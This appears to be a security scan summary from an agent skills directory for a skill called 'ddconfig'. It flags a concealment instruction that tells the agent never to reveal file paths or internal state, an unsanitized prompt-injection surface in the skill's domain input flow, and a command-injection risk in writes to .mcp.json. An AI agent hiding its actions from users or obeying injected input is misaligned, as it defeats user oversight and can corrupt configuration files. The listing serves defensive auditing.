The Agent Skills Directory

[PROMPT_INJECTION]: The skill instructions in references/mcp-settings.md mandate high levels of concealment. It explicitly directs the agent to 'never reveal' file paths, variable names, internal server states, or implementation details to the user. This instruction set reduces transparency and prevents the user from auditing the agent's interactions with the underlying file system.\n- [PROMPT_INJECTION]: The skill possesses an indirect prompt injection surface in the 'Domain Flow' where it ingests untrusted user input for sites and domains. (1) Ingestion point: User input in Domain Flow; (2) Boundary markers: Absent; (3) Capability inventory: File-read and file-write access to .mcp.json (as instructed in Domain Flow); (4) Sanitization: Absent, beyond a subjective check for 'malformed' URLs.\n- [COMMAND_EXECUTION]: The skill instructs the agent to modify a .mcp.json registration file using shell-style template syntax (e.g., ${DD_MCP_DOMAIN:-...}). Because the agent writes user-provided input directly into this structure, it creates a risk of command injection if the configuration file is later evaluated by a shell-based loader or script.

ddconfig